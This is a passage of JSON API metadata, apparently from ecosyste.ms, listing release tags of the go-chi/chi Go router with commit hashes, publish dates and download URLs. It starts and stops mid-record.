os.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.